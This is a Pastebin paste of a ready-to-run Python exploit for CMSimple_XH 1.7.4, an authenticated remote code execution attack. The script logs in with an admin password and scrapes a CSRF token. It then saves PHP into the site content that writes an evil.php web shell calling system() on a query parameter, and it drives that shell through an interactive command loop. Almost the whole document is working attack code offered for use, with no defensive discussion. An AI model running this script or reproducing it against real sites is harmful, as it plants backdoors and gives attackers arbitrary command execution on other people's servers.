API tools faq
paste
Advertisement
Denitsu

Exploit

Denitsu
Jun 2nd, 2023
1,185
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.63 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
  2. # Date: 01-10-2021
  3. # Exploit Author: Halit AKAYDIN (hLtAkydn)
  4. # Vendor Homepage: https://www.cmsimple-xh.org/
  5. # Software Link: https://www.cmsimple-xh.org/?Downloads
  6. # Version: 1.7.4
  7. # Category: Webapps
  8. # Tested on: Linux/Windows
  9.  
  10.  
  11. # CMSimple_XH is an open source project under GPL3 license
  12. # Includes an endpoint that allows remote access
  13. # Backup page is misconfigured, causing security vulnerability
  14. # User information with sufficient permissions is required.
  15.  
  16. # Example: python3 exploit.py -u http://example.com -p Admin123
  17.  
  18.  
  19.  
  20. from bs4 import BeautifulSoup
  21. from time import sleep
  22. import requests
  23. import argparse
  24.  
  25.  
  26. def main():
  27.     parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
  28.     parser.add_argument('-u', '--host', type=str, required=True)
  29.     parser.add_argument('-p', '--password', type=str, required=True)
  30.     args = parser.parse_args()
  31.     print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
  32.         "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
  33.     host(args)
  34.  
  35.  
  36. def host(args):
  37.     # Check http or https
  38.     if args.host.startswith(('http://', 'https://')):
  39.         print("[?] Check Url...\n")
  40.         sleep(2)
  41.         args.host = args.host
  42.         if args.host.endswith('/'):
  43.             args.host = args.host[:-1]
  44.         else:
  45.             pass
  46.     else:
  47.         print("\n[?] Check Adress...\n")
  48.         sleep(2)
  49.         args.host = "http://" + args.host
  50.         args.host = args.host
  51.         if args.host.endswith('/'):
  52.             args.host = args.host[:-1]
  53.         else:
  54.             pass
  55.  
  56.     # Check Host Status
  57.     try:
  58.         response = requests.get(args.host)
  59.         if response.status_code == 200:
  60.             login(args)
  61.         else:
  62.             print("[-] Address not reachable!")
  63.             sleep(2)
  64.  
  65.     except requests.ConnectionError as exception:
  66.         print("[-] Address not reachable!")
  67.         sleep(2)
  68.         exit(1)
  69.  
  70.  
  71. def login(args):
  72.     url = args.host + "/?&login"
  73.     cookies = {
  74.         "XH_2f": "evil"
  75.     }
  76.     headers = {
  77.         "Origin": args.host,
  78.         "Content-Type": "application/x-www-form-urlencoded",
  79.         "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
  80.         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  81.         "Referer": args.host + "/?&login"
  82.     }
  83.     data = {
  84.         "login": "true",
  85.         "keycut": args.password,
  86.         "submit": "Login"
  87.     }
  88.     response = requests.post(url, headers=headers, cookies=cookies, data=data)
  89.  
  90.     token = response.cookies.get("XH_2f")
  91.     soup = BeautifulSoup(response.text, 'html.parser')
  92.  
  93.     if (soup.find("link", {"rel": "next"})['href'] != "/"):
  94.         print("[!] Login Success!\n")
  95.         sleep(2)
  96.         csrf(args, token)
  97.     else:
  98.         print("[!] Wrong password!!\n")
  99.         sleep(2)
  100.  
  101.  
  102. def csrf(args, token):
  103.     url = args.host + "/?file=content"
  104.     cookies = {
  105.         "status": "adm",
  106.         "XH_2f": token
  107.     }
  108.     headers = {
  109.         "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
  110.         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  111.         "Referer": args.host + "/?&settings",
  112.         "Accept-Encoding": "gzip, deflate",
  113.         "Connection": "close"
  114.     }
  115.     response = requests.get(url, headers=headers, cookies=cookies)
  116.  
  117.     try:
  118.         soup = BeautifulSoup(response.text, 'html.parser')
  119.         csrf = soup.find_all("input", type="hidden")[3].get("value")
  120.         create(args, token, csrf)
  121.     except Exception as e:
  122.         print(e)
  123.     else:
  124.         pass
  125.  
  126.  
  127. def create(args, token, csrf):
  128.     payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"
  129.  
  130.     url = args.host
  131.     cookies = {
  132.         "status": "adm",
  133.         "XH_2f": token
  134.     }
  135.     headers = {
  136.         "Origin": args.host,
  137.         "Content-Type": "application/x-www-form-urlencoded",
  138.         "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
  139.         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  140.         "Referer": args.host + "/?file=content&action=edit&xh_success=content",
  141.         "Accept-Encoding": "gzip, deflate"
  142.     }
  143.     data = {
  144.         "text": payload,
  145.         "file": "content",
  146.         "action": "save",
  147.         "xh_csrf_token": csrf
  148.     }
  149.     response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)
  150.  
  151.     if (response.status_code == 200):
  152.         print("[!] Create Vuln File!\n")
  153.         sleep(2)
  154.         exploit(args)
  155.     else:
  156.         print("[!] Create Failed!\n")
  157.         sleep(2)
  158.  
  159.  
  160. def exploit(args):
  161.     print("[+] Exploit Done!\n")
  162.     sleep(2)
  163.  
  164.     while True:
  165.         cmd = input("$ ")
  166.         url = args.host + "/evil.php?cmd=" + cmd
  167.         headers = {
  168.             "Upgrade-Insecure-Requests": "1",
  169.             "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
  170.         }
  171.  
  172.         response = requests.post(url, headers=headers, timeout=5)
  173.  
  174.         if response.text == "":
  175.             print(cmd + ": command not found\n")
  176.         else:
  177.             print(response.text)
  178.  
  179.  
  180. if __name__ == '__main__':
  181.     main()
  182.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!